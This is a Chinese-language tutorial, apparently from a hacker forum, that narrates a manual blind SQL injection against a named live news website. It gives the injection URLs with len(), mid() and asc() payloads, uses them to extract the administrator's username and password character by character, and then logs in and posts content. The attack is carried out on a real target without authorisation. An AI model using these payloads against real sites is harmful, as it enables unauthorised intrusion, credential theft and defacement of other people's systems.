哈,大家好,好久不玩这些东西了。最近看到一些人用别人的工具到处搞破坏,
灰客,白客都出来了。。。。我晕~~~~是不是还有花客,粉客什么的。。。其实
都是一些只会用别人工具的菜鸟,还敢开站来毒害青少年!强烈鄙视!好了,费
话不多说了,今天给大家做个手工注入的动画。大家见笑了。
http://www.sx165.com/xinwen/default.asp?cataid=3这个就是今天摧残的对象!
sql注入漏洞判断:
1=1返回正常页面,1=2时候报错。 [%20就是空格的解码]
好了,现在可以说明它存在漏洞!下面我们开始注入!
1。我先猜管理员ID,假设存在admin表名
这里id=3返回了正常页面,说明管理员存在id是3,也同时证明了我刚才猜解存在
admin这个表名
2。下面我开始猜解用户名,我假设存在user字段
这里len(user)>3,["len"就是长度也意思],返回正页面,证明我猜
解存在user字段正确,并且user字段的长度是大于3的!
这里len(user)>4,返回错误页面!既然大于3又不大于4,那么它一定是等于4了!!!
看!len(user)=4返回正常页面了吧!说明user字段长度是4!
3.现在我开始破解user字段的值!
这里面涉及到mid函数,和ASC字符!
mid(字符值,字符开始位置,字串长度),比如:mid(thedaybefore,1,1)就是1,mid(thedaybefore,1,3)就是the
asc(***),“****”的内容便是asc码转换后的值!这里我们借助一个asc码转换的工具
http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>119 and id=3)
返回正确页面
http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>120 and id=3)
返回错误页面
所以asc码的值是120!下面通过工具进行转换
所以第一位用户名就是x,下面我们进行第2,3,4位的猜解!!!go on!
大于104,不大于105所以就是105啦!
所以第二位是i
大于109小于110,所以是110,ASC110=n
第三位是n
大于102,且不大于103,所以就是103,ASC103=g
哈哈!用户名已经全部猜解完成了!
xing
现在开始猜解密码!同理!大家复习一下!
现在可以肯定存在字段名pwd!下面就不打字了,大家看我操作吧!
密码位数:4
晕!在这里打吧,上面太乱了!
http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(pwd,1,1))>100 and id=3)
120,105,110,103
xing,晕!密码和用户名一样~~~~我服了那个网管了。。。。。
下面登陆上去看看!
新闻已经成功保存了...
哈哈,这个站大家就不要再搞了,管理员我已经通知了,好了,就到这里